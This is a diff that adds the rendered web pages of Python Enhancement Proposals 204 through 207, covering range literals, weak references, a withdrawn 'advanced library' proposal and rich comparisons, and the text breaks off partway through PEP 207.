This PEP describes the “range literal” proposal for Python 2.0. +This PEP tracks the status and ownership of this feature, slated +for introduction in Python 2.0. It contains a description of the +feature and outlines changes necessary to support the feature. +This PEP summarizes discussions held in mailing list forums, and +provides URLs for further information, where appropriate. The CVS +revision history of this file contains the definitive historical +record.

+
+
+

List ranges

+

Ranges are sequences of numbers of a fixed stepping, often used in +for-loops. The Python for-loop is designed to iterate over a +sequence directly:

+
>>> l = ['a', 'b', 'c', 'd']
+>>> for item in l:
+...     print item
+a
+b
+c
+d
+
+
+

However, this solution is not always prudent. Firstly, problems +arise when altering the sequence in the body of the for-loop, +resulting in the for-loop skipping items. Secondly, it is not +possible to iterate over, say, every second element of the +sequence. And thirdly, it is sometimes necessary to process an +element based on its index, which is not readily available in the +above construct.

+

For these instances, and others where a range of numbers is +desired, Python provides the range builtin function, which +creates a list of numbers. The range function takes three +arguments, start, end and step. start and step are +optional, and default to 0 and 1, respectively.

+

The range function creates a list of numbers, starting at +start, with a step of step, up to, but not including end, so +that range(10) produces a list that has exactly 10 items, the +numbers 0 through 9.

+

Using the range function, the above example would look like +this:

+
>>> for i in range(len(l)):
+...     print l[i]
+a
+b
+c
+d
+
+
+

Or, to start at the second element of l and processing only +every second element from then on:

+
>>> for i in range(1, len(l), 2):
+...     print l[i]
+b
+d
+
+
+

There are several disadvantages with this approach:

+
    +
  • Clarity of purpose: Adding another function call, possibly with +extra arithmetic to determine the desired length and step of the +list, does not improve readability of the code. Also, it is +possible to “shadow” the builtin range function by supplying a +local or global variable with the same name, effectively +replacing it. This may or may not be a desired effect.
  • +
  • Efficiency: because the range function can be overridden, the +Python compiler cannot make assumptions about the for-loop, and +has to maintain a separate loop counter.
  • +
  • Consistency: There already is a syntax that is used to denote +ranges, as shown below. This syntax uses the exact same +arguments, though all optional, in the exact same way. It seems +logical to extend this syntax to ranges, to form “range +literals”.
  • +
+
+
+

Slice Indices

+

In Python, a sequence can be indexed in one of two ways: +retrieving a single item, or retrieving a range of items. +Retrieving a range of items results in a new object of the same +type as the original sequence, containing zero or more items from +the original sequence. This is done using a “range notation”:

+
>>> l[2:4]
+['c', 'd']
+
+
+

This range notation consists of zero, one or two indices separated +by a colon. The first index is the start index, the second the +end. When either is left out, it defaults to the start or the +end of the sequence, respectively.

+

There is also an extended range notation, which incorporates +step as well. Though this notation is not currently supported +by most builtin types, if it were, it would work as follows:

+
>>> l[1:4:2]
+['b', 'd']
+
+
+

The third “argument” to the slice syntax is exactly the same as +the step argument to range(). The underlying mechanisms of the +standard, and these extended slices, are sufficiently different +and inconsistent that many classes and extensions outside of +mathematical packages do not implement support for the extended +variant. While this should be resolved, it is beyond the scope of +this PEP.

+

Extended slices do show, however, that there is already a +perfectly valid and applicable syntax to denote ranges in a way +that solves all of the earlier-stated disadvantages of the use of +the range() function:

+
    +
  • It is clearer, more concise syntax, which has already proven to +be both intuitive and easy to learn.
  • +
  • It is consistent with the other use of ranges in Python +(e.g. slices).
  • +
  • Because it is built-in syntax, instead of a builtin function, it +cannot be overridden. This means both that a viewer can be +certain about what the code does, and that an optimizer will not +have to worry about range() being “shadowed”.
  • +
+
+
+

The Proposed Solution

+

The proposed implementation of range-literals combines the syntax +for list literals with the syntax for (extended) slices, to form +range literals:

+
>>> [1:10]
+[1, 2, 3, 4, 5, 6, 7, 8, 9]
+>>> [:5]
+[0, 1, 2, 3, 4]
+>>> [5:1:-1]
+[5, 4, 3, 2]
+
+
+

There is one minor difference between range literals and the slice +syntax: though it is possible to omit all of start, end and +step in slices, it does not make sense to omit end in range +literals. In slices, end would default to the end of the list, +but this has no meaning in range literals.
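A rough model of the proposal in terms of the existing range() builtin (range_literal is a hypothetical helper name; under the proposal the bracket syntax itself would do this):

def range_literal(start, end, step=1):
    # [start:end:step] builds the same list that range() returns;
    # start defaults to 0 and step to 1, but end is always required.
    return range(start, end, step)   # range() returns a list in Python 2

range_literal(1, 10)     # [1, 2, 3, 4, 5, 6, 7, 8, 9]
range_literal(0, 5)      # [0, 1, 2, 3, 4]
range_literal(5, 1, -1)  # [5, 4, 3, 2]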

+
+
+

Reference Implementation

+

The proposed implementation can be found on SourceForge [1]. It +adds a new bytecode, BUILD_RANGE, that takes three arguments from +the stack and builds a list on the basis of those. The list is +pushed back on the stack.

+

The use of a new bytecode is necessary to be able to build ranges +based on other calculations, whose outcome is not known at compile +time.

+

The code introduces two new functions to listobject.c, which are +currently hovering between private functions and full-fledged API +calls.

+

PyList_FromRange() builds a list from start, end and step, +returning NULL if an error occurs. Its prototype is:

+
PyObject * PyList_FromRange(long start, long end, long step)
+
+
+

PyList_GetLenOfRange() is a helper function used to determine the +length of a range. Previously, it was a static function in +bltinmodule.c, but is now necessary in both listobject.c and +bltinmodule.c (for xrange). It is made non-static solely to avoid +code duplication. Its prototype is:

+
long PyList_GetLenOfRange(long start, long end, long step)
+
+
+
+
+

Open issues

+
    +
  • One possible solution to the discrepancy of requiring the end +argument in range literals is to allow the range syntax to +create a “generator”, rather than a list, as the xrange +builtin function does. However, a generator would not be a +list, and it would be impossible, for instance, to assign to +items in the generator, or append to it.

    The range syntax could conceivably be extended to include tuples +(i.e. immutable lists), which could then be safely implemented +as generators. This may be a desirable solution, especially for +large number arrays: generators require very little in the way +of storage and initialization, and there is only a small +performance impact in calculating and creating the appropriate +number on request. (TBD: is there any at all? Cursory testing +suggests equal performance even in the case of ranges of length +1)

    +

    However, even if this idea were adopted, would it be wise to +“special-case” the second argument, making it optional in one +instance of the syntax, and non-optional in other cases?

    +
  • +
  • Should it be possible to mix range syntax with normal list +literals, creating a single list? E.g.:
    >>> [5, 6, 1:6, 7, 9]
    +
    +
    +

    to create:

    +
    [5, 6, 1, 2, 3, 4, 5, 7, 9]
    +
    +
    +
  • +
  • How should range literals interact with another proposed new +feature, “list comprehensions”? Specifically, should it be +possible to create lists in list comprehensions? E.g.:
    >>> [x:y for x in (1, 2) for y in (3, 4)]
    +
    +
    +

    Should this example return a single list with multiple ranges:

    +
    [1, 2, 1, 2, 3, 2, 2, 3]
    +
    +
    +

    Or a list of lists, like so:

    +
    [[1, 2], [1, 2, 3], [2], [2, 3]]
    +
    +
    +

    However, as the syntax and semantics of list comprehensions are +still subject of hot debate, these issues are probably best +addressed by the “list comprehensions” PEP.

    +
  • +
  • Range literals accept objects other than integers: the implementation +performs PyInt_AsLong() on the objects passed in, so as long as the +objects can be coerced into integers, they will be accepted. +The resulting list, however, is always composed of standard +integers.

    Should range literals create a list of the passed-in type? It +might be desirable in the cases of other builtin types, such as +longs and strings:

    +
    >>> [ 1L : 2L<<64 : 2<<32L ]
    +>>> ["a":"z":"b"]
    +>>> ["a":"z":2]
    +
    +
    +

    However, this might be too much “magic” to be obvious. It might +also present problems with user-defined classes: even if the +base class can be found and a new instance created, the instance +may require additional arguments to __init__, causing the +creation to fail.

    +
  • +
  • The PyList_FromRange() and PyList_GetLenOfRange() functions need +to be classified: are they part of the API, or should they be +made private functions?
  • +
+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0204.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0205/index.html b/pep-0205/index.html new file mode 100644 index 00000000000..8a1e70255ba --- /dev/null +++ b/pep-0205/index.html @@ -0,0 +1,553 @@ + PEP 205 – Weak References | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 205 – Weak References

+
+
Author:
+
Fred L. Drake, Jr. <fred at fdrake.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
14-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+
11-Jan-2001
+
+
+
+
+
+

Motivation

+

There are two basic applications for weak references which have +been noted by Python programmers: object caches and reduction of +pain from circular references.

+
+

Caches (weak dictionaries)

+

There is a need to allow objects to be maintained that represent +external state, mapping a single instance to the external +reality, where allowing multiple instances to be mapped to the +same external resource would create unnecessary difficulty +maintaining synchronization among instances. In these cases, +a common idiom is to support a cache of instances; a factory +function is used to return either a new or existing instance.

+

The difficulty in this approach is that one of two things must +be tolerated: either the cache grows without bound, or there +needs to be explicit management of the cache elsewhere in the +application. The latter can be very tedious and leads to more +code than is really necessary to solve the problem at hand, +and the former can be unacceptable for long-running processes +or even relatively short processes with substantial memory +requirements.

+
    +
  • External objects that need to be represented by a single +instance, no matter how many internal users there are. This +can be useful for representing files that need to be written +back to disk in whole rather than locked & modified for +every use.
  • +
  • Objects that are expensive to create, but may be needed by +multiple internal consumers. Similar to the first case, but +not necessarily bound to external resources, and possibly +not an issue for shared state. Weak references are only +useful in this case if there is some flavor of “soft” +references or if there is a high likelihood that users of +individual objects will overlap in lifespan.
  • +
+
+
+

Circular references

+
    +
  • DOMs require a huge amount of circular (to parent & document +nodes) references, but these could be eliminated using a weak +dictionary mapping from each node to its parent. This +might be especially useful in the context of something like +xml.dom.pulldom, allowing the .unlink() operation to become +a no-op.
  • +
+

This proposal is divided into the following sections:

+
    +
  • Proposed Solution
  • +
  • Implementation Strategy
  • +
  • Possible Applications
  • +
  • Previous Weak Reference Work in Python
  • +
  • Weak References in Java
  • +
+

The full text of one early proposal is included as an appendix +since it does not appear to be available on the net.

+
+
+
+

Aspects of the Solution Space

+

There are two distinct aspects to the weak references problem:

+
    +
  • Invalidation of weak references
  • +
  • Presentation of weak references to Python code
  • +
+
+

Invalidation

+

Past approaches to weak reference invalidation have often hinged +on storing a strong reference and being able to examine all the +instances of weak reference objects, and invalidating them when +the reference count of their referent goes to one (indicating that +the reference stored by the weak reference is the last remaining +reference). This has the advantage that the memory management +machinery in Python need not change, and that any type can be +weakly referenced.

+

The disadvantage of this approach to invalidation is that it +assumes that the management of the weak references is called +sufficiently frequently that weakly-referenced objects are noticed +within a reasonably short time frame; since this means a scan over +some data structure to invalidate references, an operation which +is O(N) on the number of weakly referenced objects, this is not +effectively amortized for any single object which is weakly +referenced. This also assumes that the application is calling +into code which handles weakly-referenced objects with some +frequency, which makes weak-references less attractive for library +code.

+

An alternate approach to invalidation is for the de-allocation +code to be aware of the possibility of weak references and to make +a specific call into the weak-reference management code to allow +invalidation whenever an object is deallocated. This requires a +change in the tp_dealloc handler for weakly-referencable objects; +an additional call is needed at the “top” of the handler for +objects which support weak-referencing, and an efficient way to +map from an object to a chain of weak references for that object +is needed as well.

+
+
+

Presentation

+

Two ways that weak references are presented to the Python layer +have been as explicit reference objects upon which some operation +is required in order to retrieve a usable reference to the +underlying object, and proxy objects which masquerade as the +original objects as much as possible.

+

Reference objects are easy to work with when some additional layer +of object management is being added in Python; references can be +checked for liveness explicitly, without having to invoke +operations on the referents and catching some special exception +raised when an invalid weak reference is used.

+

However, a number of users favor the proxy approach simply because +the weak reference looks so much like the original object.

+
+
+
+

Proposed Solution

+

Weak references should be able to point to any Python object that +may have substantial memory size (directly or indirectly), or hold +references to external resources (database connections, open +files, etc.).

+

A new module, weakref, will contain new functions used to create +weak references. weakref.ref() will create a “weak reference +object” and optionally attach a callback which will be called when +the object is about to be finalized. weakref.mapping() will +create a “weak dictionary”. A third function, weakref.proxy(), +will create a proxy object that behaves somewhat like the original +object.

+

A weak reference object will allow access to the referenced object +if it hasn’t been collected and to determine if the object still +exists in memory. Retrieving the referent is done by calling the +reference object. If the referent is no longer alive, this will +return None instead.
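With the weakref module as it eventually shipped, this behaviour looks like the following (the Thing class is invented for illustration; CPython's reference counting collects the object as soon as its last strong reference disappears):

import weakref

class Thing(object):        # instances of ordinary classes are weakly referencable
    pass

obj = Thing()
r = weakref.ref(obj)        # create a weak reference object
print(r() is obj)           # True: calling the reference returns the referent
del obj                     # drop the last strong reference
print(r())                  # None: the referent has been collected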

+

A weak dictionary maps arbitrary keys to values, but does not own +a reference to the values. When the values are finalized, the +(key, value) pairs for which it is a value are removed from all +the mappings containing such pairs. Like dictionaries, weak +dictionaries are not hashable.

+

Proxy objects are weak references that attempt to behave like the +object they proxy, as much as they can. Regardless of the +underlying type, proxies are not hashable since their ability to +act as a weak reference relies on a fundamental mutability that +will cause failures when used as dictionary keys – even if the +proper hash value is computed before the referent dies, the +resulting proxy cannot be used as a dictionary key since it cannot +be compared once the referent has expired, and comparability is +necessary for dictionary keys. Operations on proxy objects after +the referent dies cause weakref.ReferenceError to be raised in +most cases. “is” comparisons, type(), and id() will continue to +work, but always refer to the proxy and not the referent.
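Again in terms of the module as shipped, a short proxy example (Thing is again an invented toy class):

import weakref

class Thing(object):
    pass

obj = Thing()
obj.colour = 'blue'
p = weakref.proxy(obj)
print(p.colour)             # attribute access passes through to the referent
del obj
try:
    p.colour                # the referent has expired
except weakref.ReferenceError:
    print('referent is gone')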

+

The callbacks registered with weak references must accept a single +parameter, which will be the weak reference or proxy object +itself. The object cannot be accessed or resurrected in the +callback.

+
+
+

Implementation Strategy

+

The implementation of weak references will include a list of +reference containers that must be cleared for each weakly-referencable +object. If the reference is from a weak dictionary, +the dictionary entry is cleared first. Then, any associated +callback is called with the object passed as a parameter. Once +all callbacks have been called, the object is finalized and +deallocated.

+

Many built-in types will participate in the weak-reference +management, and any extension type can elect to do so. The type +structure will contain an additional field which provides an +offset into the instance structure which contains a list of weak +reference structures. If the value of the field is <= 0, the +object does not participate. In this case, weakref.ref(), +<weakdict>.__setitem__() and .setdefault(), and item assignment will +raise TypeError. If the value of the field is > 0, a new weak +reference can be generated and added to the list.

+

This approach is taken to allow arbitrary extension types to +participate, without taking a memory hit for numbers or other +small types.

+

Standard types which support weak references include instances, +functions, and bound & unbound methods. With the addition of +class types (“new-style classes”) in Python 2.2, types grew +support for weak references. Instances of class types are weakly +referencable if they have a base type which is weakly referencable, +if the class does not specify __slots__, or if a slot is named +__weakref__. Generators also support weak references.

+
+
+

Possible Applications

+

PyGTK+ bindings?

+

Tkinter – could avoid circular references by using weak +references from widgets to their parents. Objects won’t be +discarded any sooner in the typical case, but there won’t be so +much dependence on the programmer calling .destroy() before +releasing a reference. This would mostly benefit long-running +applications.

+

DOM trees.

+
+
+

Previous Weak Reference Work in Python

+

Dianne Hackborn has proposed something called “virtual references”. +‘vref’ objects are very similar to java.lang.ref.WeakReference +objects, except there is no equivalent to the invalidation +queues. Implementing a “weak dictionary” would be just as +difficult as using only weak references (without the invalidation +queue) in Java. Information on this has disappeared from the Web, +but is included below as an Appendix.

+

Marc-André Lemburg’s mx.Proxy package:

+
+
+

The weakdict module by Dieter Maurer is implemented in C and +Python. It appears that the Web pages have not been updated since +Python 1.5.2a, so I’m not yet sure if the implementation is +compatible with Python 2.0.

+
+
+

PyWeakReference by Alex Shindich:

+
+
+

Eric Tiedemann has a weak dictionary implementation:

+
+
+
+
+

Weak References in Java

+

http://java.sun.com/j2se/1.3/docs/api/java/lang/ref/package-summary.html

+

Java provides three forms of weak references, and one interesting +helper class. The three forms are called “weak”, “soft”, and +“phantom” references. The relevant classes are defined in the +java.lang.ref package.

+

For each of the reference types, there is an option to add the +reference to a queue when it is invalidated by the memory +allocator. The primary purpose of this facility seems to be that +it allows larger structures to be composed to incorporate +weak-reference semantics without having to impose substantial +additional locking requirements. For instance, it would not be +difficult to use this facility to create a “weak” hash table which +removes keys and referents when a reference is no longer used +elsewhere. Using weak references for the objects without some +sort of notification queue for invalidations leads to much more +tedious implementation of the various operations required on hash +tables. This can be a performance bottleneck if deallocations of +the stored objects are infrequent.

+

Java’s “weak” references are most like Dianne Hackborn’s old vref +proposal: a reference object refers to a single Python object, +but does not own a reference to that object. When that object is +deallocated, the reference object is invalidated. Users of the +reference object can easily determine that the reference has been +invalidated, or a NullObjectDereferenceError can be raised when +an attempt is made to use the referred-to object.

+

The “soft” references are similar, but are not invalidated as soon +as all other references to the referred-to object have been +released. The “soft” reference does own a reference, but allows +the memory allocator to free the referent if the memory is needed +elsewhere. It is not clear whether this means soft references are +released before the malloc() implementation calls sbrk() or its +equivalent, or if soft references are only cleared when malloc() +returns NULL.

+

“Phantom” references are a little different; unlike weak and soft +references, the referent is not cleared when the reference is +added to its queue. When all phantom references for an object +are dequeued, the object is cleared. This can be used to keep an +object alive until some additional cleanup is performed which +needs to happen before the object’s .finalize() method is called.

+

Unlike the other two reference types, “phantom” references must be +associated with an invalidation queue.

+
+
+

Appendix – Dianne Hackborn’s vref proposal (1995)

+

[This has been indented and paragraphs reflowed, but there have been +no content changes. –Fred]

+
+

Proposal: Virtual References

+

In an attempt to partly address the recurring discussion +concerning reference counting vs. garbage collection, I would like +to propose an extension to Python which should help in the +creation of “well structured” cyclic graphs. In particular, it +should allow at least trees with parent back-pointers and +doubly-linked lists to be created without worry about cycles.

+

The basic mechanism I’d like to propose is that of a “virtual +reference,” or a “vref” from here on out. A vref is essentially a +handle on an object that does not increment the object’s reference +count. This means that holding a vref on an object will not keep +the object from being destroyed. This would allow the Python +programmer, for example, to create the aforementioned tree +structure, which is automatically destroyed when it +is no longer in use – by making all of the parent back-references +into vrefs, they no longer create reference cycles which keep the +tree from being destroyed.

+

In order to implement this mechanism, the Python core must ensure +that no -real- pointers are ever left referencing objects that no +longer exist. The implementation I would like to propose involves +two basic additions to the current Python system:

+
    +
  1. A new “vref” type, through which the Python programmer creates +and manipulates virtual references. Internally, it is +basically a C-level Python object with a pointer to the Python +object it is a reference to. Unlike all other Python code, +however, it does not change the reference count of this object. +In addition, it includes two pointers to implement a +doubly-linked list, which is used below.
  2. +
  3. The addition of a new field to the basic Python object +[PyObject_Head in object.h], which is either NULL, or points to +the head of a list of all vref objects that reference it. When +a vref object attaches itself to another object, it adds itself +to this linked list. Then, if an object with any vrefs on it +is deallocated, it may walk this list and ensure that all of +the vrefs on it point to some safe value, e.g. Nothing.
  4. +
+

This implementation should hopefully have a minimal impact on the +current Python core – when no vrefs exist, it should only add one +pointer to all objects, and a check for a NULL pointer every time +an object is deallocated.

+

Back at the Python language level, I have considered two possible +semantics for the vref object –

+
+
+

Pointer semantics

+

In this model, a vref behaves essentially like a Python-level +pointer; the Python program must explicitly dereference the vref +to manipulate the actual object it references.

+

An example vref module using this model could include the +function “new”; when used as ‘MyVref = vref.new(MyObject)’, it +returns a new vref object such that MyVref.object == MyObject. +MyVref.object would then change to Nothing if +MyObject is ever deallocated.

+

For a concrete example, we may introduce some new C-style syntax:

+
    +
  • & – unary operator, creates a vref on an object, same as vref.new().
  • +
  • * – unary operator, dereference a vref, same as VrefObject.object.
  • +
+

We can then define:

+
1.     type(&MyObject) == vref.VrefType
+2.        *(&MyObject) == MyObject
+3. (*(&MyObject)).attr == MyObject.attr
+4.          &&MyObject == Nothing
+5.           *MyObject -> exception
+
+
+

Rule #4 is subtle, but comes about because we have made a vref +to (a vref with no real references). Thus the outer vref is +cleared to Nothing when the inner one inevitably disappears.

+
+
+

Proxy semantics

+

In this model, the Python programmer manipulates vref objects +just as if she were manipulating the object it is a reference +of. This is accomplished by implementing the vref so that all +operations on it are redirected to its referenced object. With +this model, the dereference operator (*) no longer makes sense; +instead, we have only the reference operator (&), and define:

+
1.  type(&MyObject) == type(MyObject)
+2.        &MyObject == MyObject
+3. (&MyObject).attr == MyObject.attr
+4.       &&MyObject == MyObject
+
+
+

Again, rule #4 is important – here, the outer vref is in fact a +reference to the original object, and -not- the inner vref. +This is because all operations applied to a vref actually apply +to its object, so that creating a vref of a vref actually +results in creating a vref of the latter’s object.

+

The first, pointer semantics, has the advantage that it would be +very easy to implement; the vref type is extremely simple, +requiring at minimum a single attribute, object, and a function to +create a reference.

+

However, I really like the proxy semantics. Not only does it put +less of a burden on the Python programmer, but it allows you to do +nice things like use a vref anywhere you would use the actual +object. Unfortunately, it would probably be an extreme pain, if not +practically impossible, to implement in the current Python +implementation. I do have some thoughts, though, on how to do +this, if it seems interesting; one possibility is to introduce new +type-checking functions which handle the vref. This would +hopefully cause older C modules which don’t expect vrefs to simply +return a type error, until they can be fixed.

+

Finally, there are some other additional capabilities that this +system could provide. One that seems particularly interesting to +me involves allowing the Python programmer to add “destructor” +function to a vref – this Python function would be called +immediately prior to the referenced object being deallocated, +allowing a Python program to invisibly attach itself to another +object and watch for it to disappear. This seems neat, though I +haven’t actually come up with any practical uses for it, yet… :)

+

– Dianne

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0205.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0206/index.html b/pep-0206/index.html new file mode 100644 index 00000000000..12073d45293 --- /dev/null +++ b/pep-0206/index.html @@ -0,0 +1,223 @@ + PEP 206 – Python Advanced Library | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 206 – Python Advanced Library

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
14-Jul-2000
+
Post-History:
+

+
+
+
+
+
+

Important

+

This PEP has been withdrawn.

+


+

+
+
+

Introduction

+

This PEP describes the Python Advanced Library, a collection of +high-quality and frequently-used third party extension modules.

+
+
+

Batteries Included Philosophy

+

The Python source distribution has long maintained the philosophy +of “batteries included” – having a rich and versatile standard +library which is immediately available, without making the user +download separate packages. This gives the Python language a head +start in many projects.

+

However, the standard library modules aren’t always the best +choices for a job. Some library modules were quick hacks +(e.g. calendar, commands), some were designed poorly and are now +near-impossible to fix (cgi), and some have been rendered obsolete +by other, more complete modules (binascii offers the same features +as the binhex, uu, base64 modules). This PEP describes a list of +third-party modules that make Python more competitive for various +application domains, forming the Python Advanced Library.

+

The deliverable is a set of scripts that will retrieve, build, and +install the packages for a particular application domain. The +Python Package Index now contains enough information to let +software automatically find packages and download them, so the +time is ripe to implement this.

+

Currently this document doesn’t suggest removing modules from +the standard library that are superseded by a third-party module. +That’s difficult to do because it entails many backward-compatibility +problems, so it’s not worth bothering with now.

+

Please suggest additional domains of interest.

+
+
+

Domain: Web tasks

+

XML parsing: ElementTree + SAX.

+

URL retrieval: libcurl? other possibilities?

+

HTML parsing: mxTidy? HTMLParser?

+

Async network I/O: Twisted

+

RDF parser: ???

+

HTTP serving: ???

+

HTTP cookie processing: ???

+

Web framework: A WSGI gateway, perhaps? Paste?

+

Graphics: PIL, Chaco.

+
+
+

Domain: Scientific Programming

+

Numeric: Numeric, SciPy

+

Graphics: PIL, Chaco.

+
+
+

Domain: Application Development

+

GUI toolkit: ???

+

Graphics: Reportlab for PDF generation.

+
+
+

Domain: Education

+

Graphics: PyGame

+
+
+

Software covered by the GNU General Public License

+

Some of these third-party modules are covered by the GNU General +Public License and the GNU Lesser General Public License. +Providing a script to download and install such packages, or even +assembling all these packages into a single tarball or CD-ROM, +shouldn’t cause any difficulties with the GPL, under the “mere +aggregation” clause of the license.

+
+
+

Open Issues

+

What other application domains are important?

+

Should this just be a set of Ubuntu or Debian packages? Compiling +things such as PyGame can be very complicated and may be too +difficult to automate.

+
+
+

Acknowledgements

+

The PEP is based on an earlier draft PEP by Moshe Zadka, titled +“2.0 Batteries Included.”

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0206.rst

+

Last modified: 2024-04-14 13:35:25 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0207/index.html b/pep-0207/index.html new file mode 100644 index 00000000000..b4804e0ff74 --- /dev/null +++ b/pep-0207/index.html @@ -0,0 +1,587 @@ + PEP 207 – Rich Comparisons | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 207 – Rich Comparisons

+
+
Author:
+
Guido van Rossum <guido at python.org>, David Ascher <DavidA at ActiveState.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
25-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes several new features for comparisons:

+
    +
  • Allow separate overloading of <, >, <=, >=, ==, !=, both in +classes and in C extensions.
  • +
  • Allow any of those overloaded operators to return something else +besides a Boolean result.
  • +
+
+
+

Motivation

+

The main motivation comes from NumPy, whose users agree that A<B +should return an array of elementwise comparison outcomes; they +currently have to spell this as less(A,B) because A<B can only +return a Boolean result or raise an exception.

+

An additional motivation is that frequently, types don’t have a +natural ordering, but still need to be compared for equality. +Currently such a type must implement comparison and thus define +an arbitrary ordering, just so that equality can be tested.

+

Also, for some object types an equality test can be implemented +much more efficiently than an ordering test; for example, lists +and dictionaries that differ in length are unequal, but the +ordering requires inspecting some (potentially all) items.

+
+
+

Previous Work

+

Rich Comparisons have been proposed before; in particular by David +Ascher, after experience with Numerical Python:

+
+
+

It is also included below as an Appendix. Most of the material in +this PEP is derived from David’s proposal.

+
+
+

Concerns

+
    +
  1. Backwards compatibility, both at the Python level (classes using +__cmp__ need not be changed) and at the C level (extensions +defining tp_compare need not be changed, code using +PyObject_Compare() must work even if the compared objects use +the new rich comparison scheme).
  2. +
  3. When A<B returns a matrix of elementwise comparisons, an easy +mistake to make is to use this expression in a Boolean context. +Without special precautions, it would always be true. This use +should raise an exception instead.
  4. +
  5. If a class overrides x==y but nothing else, should x!=y be +computed as not(x==y), or fail? What about the similar +relationship between < and >=, or between > and <=?
  6. +
  7. Similarly, should we allow x<y to be calculated from y>x? And +x<=y from not(x>y)? And x==y from y==x, or x!=y from y!=x?
  8. +
  9. When comparison operators return elementwise comparisons, what +to do about shortcut operators like A<B<C, A<B and C<D, +A<B or C<D?
  10. +
  11. What to do about min() and max(), the ‘in’ and ‘not in’ +operators, list.sort(), dictionary key comparison, and other +uses of comparisons by built-in operations?
  12. +
+
+
+

Proposed Resolutions

+
    +
  1. Full backwards compatibility can be achieved as follows. When +an object defines tp_compare() but not tp_richcompare(), and a +rich comparison is requested, the outcome of tp_compare() is +used in the obvious way. E.g. if “<” is requested, the outcome is an +exception if tp_compare() raises an exception, 1 if +tp_compare() is negative, and 0 if it is zero or positive. Etc.

    Full forward compatibility can be achieved as follows. When a +classic comparison is requested on an object that implements +tp_richcompare(), up to three comparisons are used: first == is +tried, and if it returns true, 0 is returned; next, < is tried +and if it returns true, -1 is returned; next, > is tried and if +it returns true, +1 is returned. If any operator tried returns +a non-Boolean value (see below), the exception raised by +conversion to Boolean is passed through. If none of the +operators tried returns true, the classic comparison fallbacks +are tried next. (A Python-level sketch of this rule follows this +list.)

    +

    (I thought long and hard about the order in which the three +comparisons should be tried. At one point I had a convincing +argument for doing it in this order, based on the behavior of +comparisons for cyclical data structures. But since that code +has changed again, I’m not so sure that it makes a difference +any more.)

    +
  2. +
  3. Any type that returns a collection of Booleans instead of a +single boolean should define nb_nonzero() to raise an exception. +Such a type is considered a non-Boolean.
  4. +
  5. The == and != operators are not assumed to be each other’s +complement (e.g. IEEE 754 floating point numbers do not satisfy +this). It is up to the type to implement this if desired. +Similar for < and >=, or > and <=; there are lots of examples +where these assumptions aren’t true (e.g. tabnanny).
  6. +
  7. The reflexivity rules are assumed by Python. Thus, the +interpreter may swap y>x with x<y, y>=x with x<=y, and may swap +the arguments of x==y and x!=y. (Note: Python currently assumes +that x==x is always true and x!=x is never true; this should not +be assumed.)
  8. +
  9. In the current proposal, when A<B returns an array of +elementwise comparisons, this outcome is considered non-Boolean, +and its interpretation as Boolean by the shortcut operators +raises an exception. David Ascher’s proposal tries to deal +with this; I don’t think this is worth the additional complexity +in the code generator. Instead of A<B<C, you can write +(A<B)&(B<C).
  10. +
  11. The min() and list.sort() operations will only use the +< operator; max() will only use the > operator. The ‘in’ and +‘not in’ operators and dictionary lookup will only use the == +operator.
  12. +
+
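The forward-compatibility rule of resolution 1 can be sketched at the Python level as follows; this is not the actual C code, and where the sketch raises, the real implementation would instead fall back to the classic comparison machinery:

def classic_from_rich(x, y):
    # Derive a classic -1/0/+1 outcome from the rich operators,
    # trying ==, then <, then >, in that order.
    if x == y:
        return 0
    if x < y:
        return -1
    if x > y:
        return 1
    raise TypeError('no ordering between the operands')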
+
+

Implementation Proposal

+

This closely follows David Ascher’s proposal.

+
+

C API

+
    +
  • New functions:
    PyObject *PyObject_RichCompare(PyObject *, PyObject *, int)
    +
    +
    +

    This performs the requested rich comparison, returning a Python +object or raising an exception. The 3rd argument must be one of +Py_LT, Py_LE, Py_EQ, Py_NE, Py_GT or Py_GE.

    +
    int PyObject_RichCompareBool(PyObject *, PyObject *, int)
    +
    +
    +

    This performs the requested rich comparison, returning a +Boolean: -1 for exception, 0 for false, 1 for true. The 3rd +argument must be one of Py_LT, Py_LE, Py_EQ, Py_NE, Py_GT or +Py_GE. Note that when PyObject_RichCompare() returns a +non-Boolean object, PyObject_RichCompareBool() will raise an +exception.

    +
  • +
  • New typedef:
    typedef PyObject *(*richcmpfunc) (PyObject *, PyObject *, int);
    +
    +
    +
  • +
  • New slot in type object, replacing spare tp_xxx7:
    richcmpfunc tp_richcompare;
    +
    +
    +

    This should be a function with the same signature as +PyObject_RichCompare(), and performing the same comparison. +At least one of the arguments is of the type whose +tp_richcompare slot is being used, but the other may have a +different type. If the function cannot compare the particular +combination of objects, it should return a new reference to +Py_NotImplemented.

    +
  • +
  • PyObject_Compare() is changed to try rich comparisons if they +are defined (but only if classic comparisons aren’t defined).
  • +
+
+
+

Changes to the interpreter

+
    +
  • Whenever PyObject_Compare() is called with the intent of getting +the outcome of a particular comparison (e.g. in list.sort(), and +of course for the comparison operators in ceval.c), the code is +changed to call PyObject_RichCompare() or +PyObject_RichCompareBool() instead; if the C code needs to know +the outcome of the comparison, PyObject_IsTrue() is called on +the result (which may raise an exception).
  • +
  • Most built-in types that currently define a comparison will be +modified to define a rich comparison instead. (This is +optional; I’ve converted lists, tuples, complex numbers, and +arrays so far, and am not sure whether I will convert others.)
  • +
+
+
+

Classes

+
    +
